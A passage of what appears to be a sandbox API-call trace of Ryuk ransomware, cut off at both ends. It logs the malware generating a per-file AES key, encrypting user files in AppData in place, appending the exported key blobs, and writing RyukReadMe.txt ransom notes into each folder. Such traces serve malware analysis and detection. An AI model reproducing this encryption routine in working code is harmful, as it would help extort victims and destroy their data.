flProtect=0x4) returned 0x2760000 [0150.270] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.271] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x509b, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x509b, lpOverlapped=0x0) returned 1 [0150.271] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0150.271] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x509b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x50a0) returned 1 [0150.271] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.272] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x50a0, lpOverlapped=0x0) returned 1 [0150.272] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0150.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0150.272] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0150.272] CloseHandle (hObject=0x194) returned 1 [0150.299] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.304] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.304] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.304] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.304] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.305] SetLastError (dwErrCode=0x0) [0150.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.306] GetLastError () returned 0x0 [0150.306] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.307] CloseHandle (hObject=0x190) returned 1 [0150.307] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.307] SetLastError (dwErrCode=0x0) [0150.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.307] GetLastError () returned 0xb7 [0150.307] CloseHandle (hObject=0x190) returned 1 [0150.307] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.309] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.309] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC", dwFileAttributes=0x80) returned 1 [0150.310] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.311] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=2) returned 1 [0150.311] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=2) returned 1 [0150.311] CloseHandle (hObject=0x194) returned 1 [0150.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.311] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.311] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.311] SetLastError (dwErrCode=0x0) [0150.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.312] GetLastError () returned 0x0 [0150.312] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0150.313] CloseHandle (hObject=0x190) returned 1 [0150.313] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.313] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0150.313] SetLastError (dwErrCode=0x0) [0150.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.313] GetLastError () returned 0xb7 [0150.313] CloseHandle (hObject=0x190) returned 1 [0150.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0150.314] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.314] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0150.314] SetLastError (dwErrCode=0x0) [0150.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.315] GetLastError () returned 0x0 [0150.315] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.316] CloseHandle (hObject=0x194) returned 1 [0150.316] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0150.316] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0150.316] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0150.316] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0150.317] SetLastError (dwErrCode=0x0) [0150.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0150.317] GetLastError () returned 0x0 [0150.317] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0150.318] CloseHandle (hObject=0x194) returned 1 [0150.318] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0150.318] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0150.318] SetLastError (dwErrCode=0x0) [0150.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0150.319] GetLastError () returned 0xb7 [0150.319] CloseHandle (hObject=0x190) returned 1 [0150.319] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0150.319] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0150.319] SetLastError (dwErrCode=0x0) [0150.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.319] GetLastError () returned 0xb7 [0150.319] CloseHandle (hObject=0x18c) returned 1 [0150.319] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.319] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.319] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Op-O1so.wav", dwFileAttributes=0x80) returned 1 [0150.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Op-O1so.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\op-o1so.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.320] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=16605) returned 1 [0150.320] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=16605) returned 1 [0150.320] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3fbb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.320] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.321] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.321] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.321] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.321] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.321] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x40dd, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x40dd, lpOverlapped=0x0) returned 1 [0150.321] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.321] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x40dd, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x40e0) returned 1 [0150.321] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.321] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x40e0, lpOverlapped=0x0) returned 1 [0150.321] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.321] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.321] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.322] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.322] CloseHandle (hObject=0x18c) returned 1 [0150.341] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.346] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.346] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.346] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.346] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.346] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pRZh-44MWf.wav", dwFileAttributes=0x80) returned 1 [0150.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pRZh-44MWf.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\przh-44mwf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.347] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=56279) returned 1 [0150.347] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=56279) returned 1 [0150.347] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xdab5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.347] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.348] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.348] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.348] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.348] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.348] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdbd7, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xdbd7, lpOverlapped=0x0) returned 1 [0150.350] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.350] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xdbd7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xdbe0) returned 1 [0150.350] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.350] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xdbe0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xdbe0, lpOverlapped=0x0) returned 1 [0150.351] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.351] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.351] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.351] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.351] CloseHandle (hObject=0x18c) returned 1 [0150.367] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.372] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.372] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.372] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.372] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pr_O7Iaj7r.bmp", dwFileAttributes=0x80) returned 1 [0150.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\pr_O7Iaj7r.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pr_o7iaj7r.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.373] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=68358) returned 1 [0150.373] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=68358) returned 1 [0150.373] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x109e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.373] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0150.374] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.374] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0150.374] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0150.374] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.374] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10b06, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x10b06, lpOverlapped=0x0) returned 1 [0150.375] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0150.375] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10b06, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10b10) returned 1 [0150.375] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.375] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10b10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10b10, lpOverlapped=0x0) returned 1 [0150.376] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0150.376] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.376] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0150.376] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0150.376] CloseHandle (hObject=0x18c) returned 1 [0150.391] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.395] CryptDestroyKey (hKey=0x3b8690) returned 1 [0150.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0150.395] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0150.395] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0150.396] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qGTQ4a XrRJJO.swf", dwFileAttributes=0x80) returned 1 [0150.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\qGTQ4a XrRJJO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qgtq4a xrrjjo.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0150.396] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=91889) returned 1 [0150.396] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=91889) returned 1 [0150.396] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x165cf, lpNewFilePointer=0x0, 